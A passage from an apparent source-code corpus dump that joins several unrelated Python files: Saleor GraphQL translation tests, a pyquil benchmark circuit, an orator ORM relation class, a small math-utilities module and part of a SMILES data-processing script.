    response = staff_api_client.post_graphql(
        QUERY_TRANSLATION_PAGE, variables, permissions=perms
    )
    content = get_graphql_content(response)
    data = content["data"]["translation"]
    assert data["title"] == page.title
    assert data["translation"]["title"] == page_translation_fr.title
QUERY_TRANSLATION_SHIPPING_METHOD = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on ShippingMethodTranslatableContent{
id
name
description
translation(languageCode: $languageCode){
name
}
}
}
}
"""
@pytest.mark.parametrize(
    "perm_codenames, return_shipping_method",
    [
        (["manage_translations"], False),
        (["manage_translations", "manage_shipping"], True),
    ],
)
def test_translation_query_shipping_method(
    staff_api_client,
    shipping_method,
    shipping_method_translation_fr,
    perm_codenames,
    return_shipping_method,
):
    """Shipping-method translations resolve for the granted permission sets."""
    # NOTE(review): return_shipping_method is parametrized but unused — the
    # assertions below do not branch on it; confirm intended coverage.
    shipping_method_id = graphene.Node.to_global_id(
        "ShippingMethodType", shipping_method.id
    )
    perms = list(Permission.objects.filter(codename__in=perm_codenames))
    variables = {
        "id": shipping_method_id,
        "kind": TranslatableKinds.SHIPPING_METHOD.name,
        "languageCode": LanguageCodeEnum.FR.name,
    }
    response = staff_api_client.post_graphql(
        QUERY_TRANSLATION_SHIPPING_METHOD, variables, permissions=perms
    )
    content = get_graphql_content(response, ignore_errors=True)
    data = content["data"]["translation"]
    assert data["name"] == shipping_method.name
    assert data["description"] == shipping_method.description
    assert data["translation"]["name"] == shipping_method_translation_fr.name
QUERY_TRANSLATION_SALE = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on SaleTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
@pytest.mark.parametrize(
    "perm_codenames, return_sale",
    [
        (["manage_translations"], False),
        (["manage_translations", "manage_discounts"], True),
    ],
)
def test_translation_query_sale(
    staff_api_client, sale, sale_translation_fr, perm_codenames, return_sale
):
    """Sale translations resolve for the granted permission sets."""
    # NOTE(review): return_sale is parametrized but unused by the assertions.
    sale_id = graphene.Node.to_global_id("Sale", sale.id)
    perms = list(Permission.objects.filter(codename__in=perm_codenames))
    variables = {
        "id": sale_id,
        "kind": TranslatableKinds.SALE.name,
        "languageCode": LanguageCodeEnum.FR.name,
    }
    response = staff_api_client.post_graphql(
        QUERY_TRANSLATION_SALE, variables, permissions=perms
    )
    content = get_graphql_content(response, ignore_errors=True)
    data = content["data"]["translation"]
    assert data["name"] == sale.name
    assert data["translation"]["name"] == sale_translation_fr.name
QUERY_TRANSLATION_VOUCHER = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on VoucherTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
@pytest.mark.parametrize(
    "perm_codenames, return_voucher",
    [
        (["manage_translations"], False),
        (["manage_translations", "manage_discounts"], True),
    ],
)
def test_translation_query_voucher(
    staff_api_client, voucher, voucher_translation_fr, perm_codenames, return_voucher
):
    """Voucher translations resolve for the granted permission sets."""
    # NOTE(review): return_voucher is parametrized but unused by the assertions.
    voucher_id = graphene.Node.to_global_id("Voucher", voucher.id)
    perms = list(Permission.objects.filter(codename__in=perm_codenames))
    variables = {
        "id": voucher_id,
        "kind": TranslatableKinds.VOUCHER.name,
        "languageCode": LanguageCodeEnum.FR.name,
    }
    response = staff_api_client.post_graphql(
        QUERY_TRANSLATION_VOUCHER, variables, permissions=perms
    )
    content = get_graphql_content(response, ignore_errors=True)
    data = content["data"]["translation"]
    assert data["name"] == voucher.name
    assert data["translation"]["name"] == voucher_translation_fr.name
QUERY_TRANSLATION_MENU_ITEM = """
query translation(
$kind: TranslatableKinds!, $id: ID!, $languageCode: LanguageCodeEnum!
){
translation(kind: $kind, id: $id){
__typename
...on MenuItemTranslatableContent{
id
name
translation(languageCode: $languageCode){
name
}
}
}
}
"""
def test_translation_query_menu_item(
    staff_api_client,
    menu_item,
    menu_item_translation_fr,
    permission_manage_translations,
):
    """The translation root query resolves a MenuItemTranslatableContent node."""
    payload = {
        "id": graphene.Node.to_global_id("MenuItem", menu_item.id),
        "kind": TranslatableKinds.MENU_ITEM.name,
        "languageCode": LanguageCodeEnum.FR.name,
    }
    response = staff_api_client.post_graphql(
        QUERY_TRANSLATION_MENU_ITEM,
        payload,
        permissions=[permission_manage_translations],
    )
    translatable = get_graphql_content(response)["data"]["translation"]
    assert translatable["name"] == menu_item.name
    assert translatable["translation"]["name"] == menu_item_translation_fr.name
def test_translation_query_incorrect_kind(
    staff_api_client, menu_item, permission_manage_translations
):
    """Requesting a menu item under the PRODUCT kind resolves to nothing."""
    variables = {
        "id": graphene.Node.to_global_id("MenuItem", menu_item.id),
        "kind": TranslatableKinds.PRODUCT.name,
        "languageCode": LanguageCodeEnum.FR.name,
    }
    content = get_graphql_content(
        staff_api_client.post_graphql(
            QUERY_TRANSLATION_MENU_ITEM,
            variables,
            permissions=[permission_manage_translations],
        )
    )
    assert not content["data"]["translation"]
def test_translation_query_no_permission(staff_api_client, menu_item):
    """Without manage_translations the translation query is rejected."""
    node_id = graphene.Node.to_global_id("MenuItem", menu_item.id)
    response = staff_api_client.post_graphql(
        QUERY_TRANSLATION_MENU_ITEM,
        {
            "id": node_id,
            "kind": TranslatableKinds.MENU_ITEM.name,
            "languageCode": LanguageCodeEnum.FR.name,
        },
    )
    assert_no_permission(response)
def test_product_and_attribute_translation(user_api_client, product, channel_USD):
    """Product and attribute translations are visible to regular (non-staff) users."""
    description = dummy_editorjs("test desription")
    product.translations.create(
        language_code="pl", name="Produkt", description=description
    )
    assigned_attribute = product.attributes.first()
    attribute = assigned_attribute.attribute
    attribute.translations.create(language_code="pl", name="Kolor")
    query = """
    query productById($productId: ID!, $channel: String) {
        product(id: $productId, channel: $channel) {
            translation(languageCode: PL) {
                name
                description
                descriptionJson
                language {
                    code
                }
            }
            attributes{
                attribute{
                    translation(languageCode: PL){
                        id
                        name
                        language{
                            code
                        }
                    }
                }
            }
        }
    }
    """
    product_id = graphene.Node.to_global_id("Product", product.id)
    response = user_api_client.post_graphql(
        query, {"productId": product_id, "channel": channel_USD.slug}
    )
    data = get_graphql_content(response)["data"]
    product_translation_data = data["product"]["translation"]
    assert product_translation_data["name"] == "Produkt"
    assert product_translation_data["language"]["code"] == "PL"
    # description and its deprecated descriptionJson alias must agree.
    assert (
        product_translation_data["description"]
        == product_translation_data["descriptionJson"]
        == dummy_editorjs("test desription", json_format=True)
    )
    attribute_translation_data = data["product"]["attributes"][0]["attribute"][
        "translation"
    ]
    assert attribute_translation_data["name"] == "Kolor"
    assert attribute_translation_data["language"]["code"] == "PL"
def test_product_attribute_value_rich_text_translation(
    staff_api_client,
    product_with_rich_text_attribute,
    permission_manage_translations,
):
    """Rich-text attribute-value translations are returned as JSON strings."""
    rich_text = dummy_editorjs("Test_dummy_data")
    assigned_attribute = product_with_rich_text_attribute[0].attributes.first()
    attribute_value = assigned_attribute.attribute.values.first()
    attribute_value.translations.create(language_code="pl", rich_text=rich_text)
    product_id = graphene.Node.to_global_id(
        "Product", product_with_rich_text_attribute[0].id
    )
    query = """
        query translation(
            $kind: TranslatableKinds!
            $id: ID!
            $languageCode: LanguageCodeEnum!
        ) {
            translation(kind: $kind, id: $id) {
                ... on ProductTranslatableContent {
                    name
                    attributeValues {
                        name
                        richText
                        translation(languageCode: $languageCode) {
                            name
                            richText
                        }
                    }
                }
            }
        }
    """
    variables = {
        "id": product_id,
        "kind": TranslatableKinds.PRODUCT.name,
        "languageCode": LanguageCodeEnum.PL.name,
    }
    response = staff_api_client.post_graphql(
        query, variables, permissions=[permission_manage_translations]
    )
    data = get_graphql_content(response)["data"]
    attribute_value_response = data["translation"]["attributeValues"][0]
    assert attribute_value_response["name"] == attribute_value.name
    assert attribute_value_response["richText"] == json.dumps(attribute_value.rich_text)
    assert attribute_value_response["translation"]["richText"] == json.dumps(rich_text)
def test_product_variant_attribute_value_rich_text_translation(
    staff_api_client,
    product_with_rich_text_attribute,
    permission_manage_translations,
    product_type_with_rich_text_attribute,
):
    """Variant rich-text attribute-value translations are returned as JSON strings."""
    rich_text = dummy_editorjs("Test_dummy_data")
    variant_attr = product_type_with_rich_text_attribute.variant_attributes.first()
    attribute_value = variant_attr.values.first()
    attribute_value.translations.create(language_code="pl", rich_text=rich_text)
    variant_id = graphene.Node.to_global_id(
        "ProductVariant", product_with_rich_text_attribute[1].id
    )
    query = """
        query translation(
            $kind: TranslatableKinds!
            $id: ID!
            $languageCode: LanguageCodeEnum!
        ) {
            translation(kind: $kind, id: $id) {
                ... on ProductVariantTranslatableContent {
                    name
                    attributeValues {
                        name
                        richText
                        translation(languageCode: $languageCode) {
                            name
                            richText
                        }
                    }
                }
            }
        }
    """
    variables = {
        "id": variant_id,
        "kind": TranslatableKinds.VARIANT.name,
        "languageCode": LanguageCodeEnum.PL.name,
    }
    response = staff_api_client.post_graphql(
        query, variables, permissions=[permission_manage_translations]
    )
    data = get_graphql_content(response)["data"]
    translations_response = data["translation"]["attributeValues"][0]
    assert translations_response["name"] == attribute_value.name
    assert translations_response["richText"] == json.dumps(attribute_value.rich_text)
    assert translations_response["translation"]["richText"] == json.dumps(rich_text)
def test_page_attribute_value_rich_text_translation(
    staff_api_client,
    page_with_rich_text_attribute,
    permission_manage_translations,
    page_type_with_rich_text_attribute,
    permission_manage_pages,
):
    """Page rich-text attribute-value translations are returned as JSON strings."""
    rich_text = dummy_editorjs("Test_dummy_data")
    variant_attr = page_type_with_rich_text_attribute.page_attributes.first()
    attribute_value = variant_attr.values.first()
    attribute_value.translations.create(language_code="pl", rich_text=rich_text)
    page_id = graphene.Node.to_global_id("Page", page_with_rich_text_attribute.id)
    query = """
        query translation(
            $kind: TranslatableKinds!
            $id: ID!
            $languageCode: LanguageCodeEnum!
        ) {
            translation(kind: $kind, id: $id) {
                ... on PageTranslatableContent {
                    attributeValues {
                        name
                        richText
                        translation(languageCode: $languageCode) {
                            name
                            richText
                        }
                    }
                }
            }
        }
    """
    variables = {
        "id": page_id,
        "kind": TranslatableKinds.PAGE.name,
        "languageCode": LanguageCodeEnum.PL.name,
    }
    response = staff_api_client.post_graphql(
        query, variables, permissions=[permission_manage_translations]
    )
    data = get_graphql_content(response)["data"]
    attribute_value_response = data["translation"]["attributeValues"][0]
    assert attribute_value_response["name"] == attribute_value.name
    assert attribute_value_response["richText"] == json.dumps(attribute_value.rich_text)
    assert attribute_value_response["translation"]["richText"] == json.dumps(rich_text)
| 32.627559 | 88 | 0.646596 |
3ba86633bd3a0dd66fca80cd0d8353322c960d3b | 2,436 | py | Python | benchmark/startPyquil1752.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startPyquil1752.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | benchmark/startPyquil1752.py | UCLA-SEAL/QDiff | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | [
"BSD-3-Clause"
] | null | null | null | # qubit number=5
# total number=60
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
    """Build the auto-generated 5-qubit benchmark circuit.

    The gate sequence is machine-generated (the "# number=" comments are the
    generator's gate ids), so the order is intentionally left untouched.

    :return: the assembled pyquil Program
    """
    prog = Program() # circuit begin
    prog += H(0) # number=3
    prog += CNOT(0,4) # number=57
    prog += X(4) # number=58
    prog += CNOT(0,4) # number=59
    prog += CNOT(2,0) # number=45
    prog += Z(2) # number=46
    prog += H(0) # number=54
    prog += CZ(2,0) # number=55
    prog += H(0) # number=56
    prog += H(1) # number=4
    prog += RX(2.664070570244145,1) # number=39
    prog += H(2) # number=5
    prog += H(3) # number=6
    prog += H(2) # number=49
    prog += CZ(3,2) # number=50
    prog += H(2) # number=51
    prog += H(4) # number=21
    prog += H(0) # number=1
    prog += H(3) # number=40
    prog += Y(4) # number=35
    prog += H(1) # number=2
    prog += H(2) # number=7
    prog += H(3) # number=8
    prog += H(0) # number=25
    prog += CZ(1,0) # number=26
    prog += H(0) # number=27
    prog += H(0) # number=36
    prog += CZ(1,0) # number=37
    prog += H(0) # number=38
    prog += CNOT(1,0) # number=41
    prog += X(0) # number=42
    prog += CNOT(1,0) # number=43
    prog += CNOT(1,0) # number=34
    prog += CNOT(1,0) # number=24
    prog += CNOT(0,1) # number=29
    prog += CNOT(2,3) # number=44
    prog += X(1) # number=30
    prog += CNOT(0,1) # number=31
    prog += X(2) # number=11
    prog += X(3) # number=12
    prog += X(0) # number=13
    prog += X(1) # number=14
    prog += X(2) # number=15
    prog += X(3) # number=16
    prog += H(0) # number=17
    prog += H(1) # number=18
    prog += H(2) # number=19
    prog += H(3) # number=20
    prog += Z(1) # number=52
    # circuit end
    return prog
def summrise_results(bitstrings) -> dict:
    """Count how many times each bitstring occurs.

    :param bitstrings: iterable of measurement bitstrings
    :return: dict mapping each bitstring to its frequency
    """
    counts = {}
    for bitstring in bitstrings:
        # dict.get with a default replaces the original is-None branching.
        counts[bitstring] = counts.get(bitstring, 0) + 1
    return counts
if __name__ == '__main__':
    # Build the circuit and sample it 1024 times on a 5-qubit QVM.
    prog = make_circuit()
    qvm = get_qc('5q-qvm')
    results = qvm.run_and_measure(prog,1024)
    # Transpose per-qubit result arrays into per-shot rows, then join each
    # row into a single bitstring.
    bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
    bitstrings = [''.join(map(str, l)) for l in bitstrings]
    # Persist the measurement histogram for later analysis.
    writefile = open("../data/startPyquil1752.csv","w")
    print(summrise_results(bitstrings),file=writefile)
    writefile.close()
| 25.642105 | 64 | 0.539819 |
54f104c59f65d8f93a0d0b1bdbc169f3ead79c9a | 5,841 | py | Python | orator/orm/relations/relation.py | HeathLee/sorator | 271668865bf0d039908643e3df9b98c966b9d956 | [
"MIT"
] | null | null | null | orator/orm/relations/relation.py | HeathLee/sorator | 271668865bf0d039908643e3df9b98c966b9d956 | [
"MIT"
] | null | null | null | orator/orm/relations/relation.py | HeathLee/sorator | 271668865bf0d039908643e3df9b98c966b9d956 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from contextlib import contextmanager
from ...query.expression import QueryExpression
from ..builder import Builder
class Relation:
    """Base class for ORM relationships between a parent model and a Builder.

    Subclasses implement the abstract constraint/matching hooks; unknown
    attribute access is proxied to the underlying query Builder so relations
    can be used fluently like queries.
    """
    # Class-wide switch; no_constraints() temporarily disables add_constraints().
    _constraints = True
    def __init__(self, query, parent):
        """
        :param query: A Builder instance
        :type query: orm.orator.Builder
        :param parent: The parent model
        :type parent: Model
        """
        self._query = query
        self._parent = parent
        self._related = query.get_model()
        # Optional extra query merged into every query built via new_query().
        self._extra_query = None
        self.add_constraints()
    def add_constraints(self):
        """
        Set the base constraints on the relation query.
        :rtype: None
        """
        raise NotImplementedError
    def add_eager_constraints(self, models):
        """
        Set the constraints for an eager load of the relation.
        :type models: list
        """
        raise NotImplementedError
    def init_relation(self, models, relation):
        """
        Initialize the relation on a set of models.
        :type models: list
        :type relation: str
        """
        raise NotImplementedError
    def match(self, models, results, relation):
        """
        Match the eagerly loaded results to their parents.
        :type models: list
        :type results: Collection
        :type relation: str
        """
        raise NotImplementedError
    def get_results(self):
        """
        Get the results of the relationship.
        """
        raise NotImplementedError
    def get_eager(self):
        """
        Get the relationship for eager loading.
        :rtype: Collection
        """
        return self.get()
    def touch(self):
        """
        Touch all of the related models for the relationship.
        """
        column = self.get_related().get_updated_at_column()
        self.raw_update({column: self.get_related().fresh_timestamp()})
    def raw_update(self, attributes=None):
        """
        Run a raw update against the base query.
        :type attributes: dict
        :rtype: int
        """
        if attributes is None:
            attributes = {}
        if self._query is not None:
            return self._query.update(attributes)
    def get_relation_count_query(self, query, parent):
        """
        Add the constraints for a relationship count query.
        :type query: Builder
        :type parent: Builder
        :rtype: Builder
        """
        query.select(QueryExpression('COUNT(*)'))
        key = self.wrap(self.get_qualified_parent_key_name())
        return query.where(self.get_has_compare_key(),
                           '=', QueryExpression(key))
    @classmethod
    @contextmanager
    def no_constraints(cls, with_subclasses=False):
        """
        Runs a callback with constraints disabled on the relation.
        """
        cls._constraints = False
        if with_subclasses:
            for klass in cls.__subclasses__():
                klass._constraints = False
        try:
            yield cls
        except Exception:
            # Re-raised unchanged; the finally block below restores the flag.
            raise
        finally:
            cls._constraints = True
            if with_subclasses:
                for klass in cls.__subclasses__():
                    klass._constraints = True
    def get_keys(self, models, key=None):
        """
        Get all the primary keys for an array of models.
        :type models: list
        :type key: str
        :rtype: list
        """
        return list(set(map(lambda value: value.get_attribute(
            key) if key else value.get_key(), models)))
    def get_query(self):
        """Return the underlying Builder for this relation."""
        return self._query
    def get_base_query(self):
        """Return the raw query beneath the Builder."""
        return self._query.get_query()
    def merge_query(self, query):
        """Merge another query (Builder or raw) into this relation's query."""
        if isinstance(query, Builder):
            query = query.get_query()
        self._query.merge(query)
    def get_parent(self):
        """Return the parent model of the relation."""
        return self._parent
    def get_qualified_parent_key_name(self):
        """Return the fully qualified parent key name."""
        return self._parent.get_qualified_key_name()
    def get_related(self):
        """Return the related model of the relation."""
        return self._related
    def created_at(self):
        """
        Get the name of the "created at" column.
        :rtype: str
        """
        return self._parent.get_created_at_column()
    def updated_at(self):
        """
        Get the name of the "updated at" column.
        :rtype: str
        """
        return self._parent.get_updated_at_column()
    def get_related_updated_at(self):
        """
        Get the name of the related model's "updated at" column.
        :rtype: str
        """
        return self._related.get_updated_at_column()
    def wrap(self, value):
        """
        Wrap the given value with the parent's query grammar.
        :rtype: str
        """
        return self._parent.new_query().get_query().get_grammar().wrap(value)
    def set_parent(self, parent):
        """Replace the parent model of the relation."""
        self._parent = parent
    def set_extra_query(self, query):
        """Attach an extra query merged into every query from new_query()."""
        self._extra_query = query
    def new_query(self, related=None):
        """Build a fresh query for the related model, merging any extra query."""
        if related is None:
            related = self._related
        query = related.new_query()
        if self._extra_query:
            query.merge(self._extra_query.get_query())
        return query
    def new_instance(self, model, **kwargs):
        """Create a new relation instance, propagating the extra query.

        NOTE(review): ``_new_instance`` is not defined on Relation itself —
        presumably supplied by subclasses or a decorator; confirm.
        """
        new = self._new_instance(model, **kwargs)
        if self._extra_query:
            new.set_extra_query(self._extra_query)
        return new
    def __dynamic(self, method):
        """Proxy attribute access to the underlying Builder.

        Callables are wrapped so that fluent Builder methods which return
        the query itself return this Relation instead, keeping chaining.
        """
        attribute = getattr(self._query, method)
        def call(*args, **kwargs):
            result = attribute(*args, **kwargs)
            if result is self._query:
                return self
            return result
        if not callable(attribute):
            return attribute
        return call
    def __getattr__(self, item):
        """Fall back to the wrapped Builder for unknown attributes."""
        return self.__dynamic(item)
| 23.938525 | 77 | 0.578497 |
a237f9ae9d2bbe3d179366ec39e9c1e570b8d068 | 4,983 | py | Python | PyMathTools.py | iblacksand/PyMathTools | b558ec2dbcd901be2614fa768cc3894da18f9b7d | [
"BSD-3-Clause"
] | null | null | null | PyMathTools.py | iblacksand/PyMathTools | b558ec2dbcd901be2614fa768cc3894da18f9b7d | [
"BSD-3-Clause"
] | null | null | null | PyMathTools.py | iblacksand/PyMathTools | b558ec2dbcd901be2614fa768cc3894da18f9b7d | [
"BSD-3-Clause"
] | null | null | null | # PyMathTools by John Elizarraras
# This is free and please make any changes you want no need for credit
from math import gcd
__all__ = ['binary_search', 'mod', 'to_ints', 'read_file', 'latex_gen_graph', 'elliptic_card', 'is_prime']
def binary_search(array, target):
    """ Does a binary search to find the index of an element in an array.
    WARNING - ARRAY HAS TO BE SORTED

    Uses the standard-library ``bisect`` module instead of the original
    hand-rolled loop; as before, ``None`` is returned when the target is
    absent (implicitly in the original).

    Keyword arguments:
    array - the sorted array that may contain the target
    target - the target element for which its index will be returned
    returns the index of target in array, or None if it is not present
    """
    from bisect import bisect_left  # local import keeps module-level deps unchanged
    i = bisect_left(array, target)
    if i < len(array) and array[i] == target:
        return i
    return None
def mod(n, modulus):
    ''' A safer mod function than %, where invertible fractions are handled.

    Integer-valued n is reduced directly. A fractional n whose reciprocal is
    an integer coprime with the modulus is mapped to the modular inverse of
    that reciprocal; anything else raises ValueError.

    Keyword arguments:
    n - the number to take modulo by
    modulus - the modulus (must be integer-valued)
    returns n mod modulus
    '''
    if not float(modulus).is_integer():
        raise ValueError('Modulus is not an integer')
    if float(n).is_integer():
        return n % modulus
    reciprocal = 1 / n
    if not float(reciprocal).is_integer():
        raise ValueError('Inverse of n is not an integer and n is a fraction')
    if gcd(int(reciprocal), int(modulus)) != 1:
        raise ValueError('Inverse of n is not coprime with modulus')
    base = int(reciprocal)
    candidate = 1
    # Brute-force search for the modular inverse of the reciprocal.
    while (base * candidate) % modulus != 1:
        candidate += 1
    return candidate
def to_ints(array):
    ''' converts everything in an array into ints, in place

    Keyword arguments
    array - the array containing the values to convert
    returns the same array object with every element converted to int
    '''
    # Slice assignment keeps the original list object (callers may alias it).
    array[:] = [int(element) for element in array]
    return array
def read_file(f):
    ''' reads a file and converts the file into a list of floats. Numbers are
    separated by whitespace and all lines are read. You can use the to_ints
    function to convert the result.

    Fixes over the original: the file handle is closed via a context manager
    (it was leaked before), and str.split() without an argument tolerates
    repeated spaces/tabs/blank lines, which previously crashed on float('').

    Keyword arguments:
    f - the path/name of the file
    returns a list of floats
    '''
    values = []
    with open(f, "r") as handle:
        for line in handle:
            values.extend(float(token) for token in line.split())
    return values
def latex_gen_graph(array, title, xaxis, yaxis, xmin, ymin, xmax, ymax):
    ''' generates a tikz graph with the provided points
    ----
    if there are too many points(out of memory) try using 'pdflatex --enable-write18 --extra-mem-bot=10000000 --synctex=1 <filename>' to make it compile
    ---
    Fix over the original: the output file is managed with a context manager,
    so the handle is flushed and closed even on error (it was leaked before).

    Keyword arguments:
    array - A 2d array where the first column is the x value and the second is the y
    title(str) - the title of the graph. This will also be the title of the produced tex file
    xaxis(str) - the label for the x axis
    yaxis(str) - the label for the y axis
    xmin - the min x value on the x axis
    ymin - the min y value on the y axis
    xmax - the max x value on the x axis
    ymax - the max y value on y axis
    '''
    with open(title + ".tex", "w+") as w:
        w.write("\\documentclass{amsart}\n\\usepackage{pgfplots}\n\\begin{document}\n\\begin{tikzpicture}\n\\begin{axis}[\ntitle = {"+ title + "},\nxlabel={"+ xaxis +"},\nylabel={" + yaxis + "},\nxmin = " + str(xmin) + ", xmax=" + str(xmax) + ",\n")
        w.write("ymin=" + str(ymin) + ", ymax=" + str(ymax) + ",\nlegend pos=north west,\nymajorgrids=true,\ngrid style=dashed,\n]\n\n")
        w.write("\\addplot[\ncolor=blue,\nmark=square,\n]\ncoordinates {\n")
        for i in range(len(array)):
            w.write("(" + str(array[i][0]) + "," + str(array[i][1]) + ")")
        w.write("\n};\n\n")
        w.write("\end{axis}\n\end{tikzpicture}\n\end{document}")
def elliptic_card(a, b, m):
    """Count the solutions of an elliptic curve y^2 = x^3 + ax + b (mod m).

    The point at infinity is counted, so the result is 1 plus the number
    of affine (x, y) pairs satisfying the congruence.

    Keyword arguments:
    a -- the a value in the formula
    b -- the b value in the formula
    m -- the modulus
    Returns an int: the cardinality of the curve.
    """
    # The original called an undefined helper `mod(x, m)`; plain Python's
    # `%` operator is the modulo it needs.
    ysquares = [(y * y) % m for y in range(m)]
    card = 1  # start at 1 to count the point at infinity
    for x in range(m):
        rhs = (x ** 3 + a * x + b) % m
        for ysq in ysquares:
            if rhs == ysq:
                card += 1
    return card
def is_prime(n):
    """Check whether *n* is prime by 6k +/- 1 trial division.

    Keyword arguments:
    n -- the candidate to check
    Returns True if n is prime, False otherwise (including n < 2).
    """
    # 0, 1 and negative numbers are not prime; the original fell through
    # the trial-division loop and wrongly returned True for them.
    if n < 2:
        return False
    if n in (2, 3):
        return True
    if n % 2 == 0 or n % 3 == 0:
        return False
    # All primes > 3 are of the form 6k +/- 1; alternate steps of 2 and 4.
    i = 5
    w = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += w
        w = 6 - w
    return True
| 32.357143 | 245 | 0.575356 |
199ec010875f322a39dbe0156e762257625b09ce | 13,288 | py | Python | zairachem/tools/mollib/virtual_libraries/experiments/do_data_processing.py | ersilia-os/ersilia-automl-chem | fabb1f05d17cff11ec0e084495eed4c0152f2f63 | [
"MIT"
] | 44 | 2019-11-08T09:45:34.000Z | 2022-03-14T12:14:23.000Z | zairachem/tools/mollib/virtual_libraries/experiments/do_data_processing.py | ersilia-os/ersilia-automl-chem | fabb1f05d17cff11ec0e084495eed4c0152f2f63 | [
"MIT"
] | 2 | 2020-06-08T04:49:12.000Z | 2021-04-16T08:17:53.000Z | zairachem/tools/mollib/virtual_libraries/experiments/do_data_processing.py | ersilia-os/ersilia-automl-chem | fabb1f05d17cff11ec0e084495eed4c0152f2f63 | [
"MIT"
] | 22 | 2019-11-08T18:53:01.000Z | 2022-02-19T11:00:36.000Z | # Copyright (c) 2019 ETH Zurich
import os, sys
import argparse
import configparser
import time
import re
import numpy as np
import random
import collections
from random import shuffle
from rdkit import Chem
from rdkit.Chem import Draw
sys.path.append('../src/')
from python import helper as hp
from python import helper_chem as hp_chem
from python import fixed_parameters as FP
def _str2bool(value):
    """Parse a command-line boolean flag value.

    argparse's type=bool treats every non-empty string — including the
    literal 'False' — as True; this helper interprets the text instead.
    """
    return str(value).lower() in ('1', 'true', 'yes', 'y', 't')

parser = argparse.ArgumentParser(description='Run data processing')
parser.add_argument('-fn','--filename', type=str, help='Path to the fine-tuning txt file', required=True)
parser.add_argument('-v','--verbose', type=_str2bool, help='Verbose', required=True)
def load_data(data_path, min_len, max_len, verbose=False):
    """Load a .txt file of SMILES strings, pruned by length and validity.

    Lines whose length lies outside [min_len, max_len] are dropped, as are
    SMILES that RDKit cannot parse.

    Parameters:
    - data_path (string): path to the dataset.
    - min_len (int): minimum length of SMILES to be kept in the dataset.
    - max_len (int): maximum length of SMILES to be kept in the dataset.

    Returns a pair (list of SMILES strings, list of RDKit mol objects).
    """
    data = []
    data_rdkit = []

    with open(data_path) as f:
        for line in f:
            smi = line.rstrip('\r\n')
            if min_len <= len(smi) <= max_len:
                # keep only SMILES that RDKit can actually parse
                mol = Chem.MolFromSmiles(smi)
                if mol is not None:
                    data.append(smi)
                    data_rdkit.append(mol)

    if verbose: print(f'Size of the dataset after pruning by length and check with RDKit: {len(data)}')

    return data, data_rdkit
def randomSmiles(mol):
    """Return one random SMILES representation of *mol*.

    Shuffles the canonical ranking numbers of the atoms so that RDKit's
    canonical writer emits a different, equivalent SMILES string.
    """
    mol.SetProp("_canonicalRankingNumbers", "True")
    order = list(range(mol.GetNumAtoms()))
    random.shuffle(order)
    for atom_index, rank in enumerate(order):
        mol.GetAtomWithIdx(atom_index).SetProp("_canonicalRankingNumber", str(rank))
    return Chem.MolToSmiles(mol)
def smile_augmentation(smile, augmentation, min_len, max_len):
    """Generate up to *augmentation* alternative SMILES for one molecule.

    Tries at most 1000 random rewrites, keeping only candidates no longer
    than max_len. (min_len is accepted for interface symmetry but is not
    used as a filter here.)
    Returns a list of distinct alternative SMILES strings.
    """
    mol = Chem.MolFromSmiles(smile)
    alternatives = set()
    for _ in range(1000):
        candidate = randomSmiles(mol)
        if len(candidate) <= max_len:
            alternatives.add(candidate)
        if len(alternatives) == augmentation:
            break
    return list(alternatives)
def augment_dataset(data_ori, augmentation, min_len, max_len, verbose=False):
    """
    Function to augment a dataset.

    Parameters:
    - data_ori (list): list of SMILES string to augment.
    - augmentation (int): number of alternative SMILES to create.
    - min_len (int): minimum length of alternative SMILES.
    - max_len (int): maximum length of alternative SMILES.
    - verbose (bool): print progress every 50000 molecules.

    return: a list alternative SMILES representations of data_ori
    """
    all_alternative_smi = []
    for i, smi in enumerate(data_ori):
        alternative_smi = smile_augmentation(smi, augmentation, min_len, max_len)
        all_alternative_smi.extend(alternative_smi)
        # The original tested `i % 50000` (truthy), which printed on every
        # step EXCEPT multiples of 50000; report once per 50000 instead.
        if verbose and i % 50000 == 0:
            print(f'augmentation is at step {i}')
    if verbose:
        # The original printed a plain (non-f) string and referenced an
        # undefined variable `n_new`.
        print(f'data augmentation done; number of new SMILES: {len(all_alternative_smi)}')

    return all_alternative_smi
def do_data_analysis(data_rdkit, descriptor_name, save_dir, verbose=False):
    """
    Analyze a dataset: compute RDKit descriptors, Morgan fingerprints, and
    Murcko plus generic scaffolds, saving each result under save_dir.

    Parameters:
    - data_rdkit: list of RDKit mol.
    - descriptor_name (string): name of descriptor to compute.
      NOTE(review): this parameter is not actually used below — the
      descriptor names are re-read from FP.DESCRIPTORS; confirm intent.
    - save_dir (string): path prefix for the analysis output files.
    - verbose (bool): forwarded to the fingerprint calculation.
    """
    # Compute the descriptors with rdkit
    # as defined in the fixed parameter file
    desc_names = re.compile(FP.DESCRIPTORS['names'])
    functions, names = hp_chem.get_rdkit_desc_functions(desc_names)
    descriptors = hp_chem.rdkit_desc(data_rdkit, functions, names)
    hp.save_obj(descriptors, f'{save_dir}desc')

    # Compute fingerprints (pickled as a one-key dict)
    fingerprint = hp_chem.fingerprint_calc(data_rdkit, verbose=verbose)
    fp_dict = {'fingerprint': fingerprint}
    hp.save_obj(fp_dict, f'{save_dir}fp')

    # Extract Murcko and generic scaffolds; saved both pickled and as
    # plain-text lists for later novelty checks
    scaf, generic_scaf = hp_chem.extract_murcko_scaffolds(data_rdkit)
    desc_scaf = {'scaffolds': scaf, 'generic_scaffolds': generic_scaf}
